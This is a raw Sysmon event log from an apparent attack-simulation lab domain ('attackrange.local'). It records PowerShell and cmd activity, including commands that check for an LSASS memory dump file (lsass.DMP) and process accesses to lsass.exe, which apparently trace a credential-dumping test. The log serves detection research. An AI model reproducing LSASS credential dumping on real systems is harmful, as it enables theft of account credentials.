21:10:04.981{4DB9351A-A32C-60D3-3E06-00000000CF01}332C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "py -3 --version >nul 2>&1 && exit /b %%errorlevel%%" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000025157Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.936{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F9633CAEFABE88A261E9EA445931DE9,SHA256=5A8E40D320C630CA1A2D076FF4ADAFE3A751DD259D529A31594A888F6079AFBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025156Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.920{4DB9351A-A32C-60D3-3C06-00000000CF01}5544ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025155Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.920{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B253A3865832081BE03BD70D2C3EF999,SHA256=B94C2528C86ABD64A606C75030CF9BB7B074876CA26D560A4FFD3305CFE53FEA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025154Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.889{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32C-60D3-3D06-00000000CF01}5292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025153Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.889{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025152Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.889{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025151Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.889{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025150Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.889{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025149Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.889{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32C-60D3-3D06-00000000CF01}5292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025148Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.889{4DB9351A-A32C-60D3-3C06-00000000CF01}55447024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32C-60D3-3D06-00000000CF01}5292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9ca36d54(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\Sy
stem.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beabb9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64) 154100x800000000000000025147Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.891{4DB9351A-A32C-60D3-3D06-00000000CF01}5292C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "if not exist %%tmp%%\lsass.DMP (exit /b 
1)"C:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {cmd /c \""if not exist %tmp%\lsass.DMP (exit /b 1)\""} 10341000x800000000000000025146Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.873{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025145Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.873{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025144Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.827{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025143Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.827{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
17141700x800000000000000025142Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:04.795{4DB9351A-A32C-60D3-3C06-00000000CF01}5544\PSHost.132689562047173539.5544.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025141Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.780{4DB9351A-A32C-60D3-3C06-00000000CF01}5544ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0vplgbkj.fya.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025140Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.780{4DB9351A-A32C-60D3-3C06-00000000CF01}5544ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_05ypjy2p.fst.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025139Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.764{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_05ypjy2p.fst.ps12021-06-23 21:10:04.764 10341000x800000000000000025138Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.748{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025137Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.717{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025136Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.717{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025135Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025134Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025133Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025132Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025131Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.717{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025130Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.717{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a350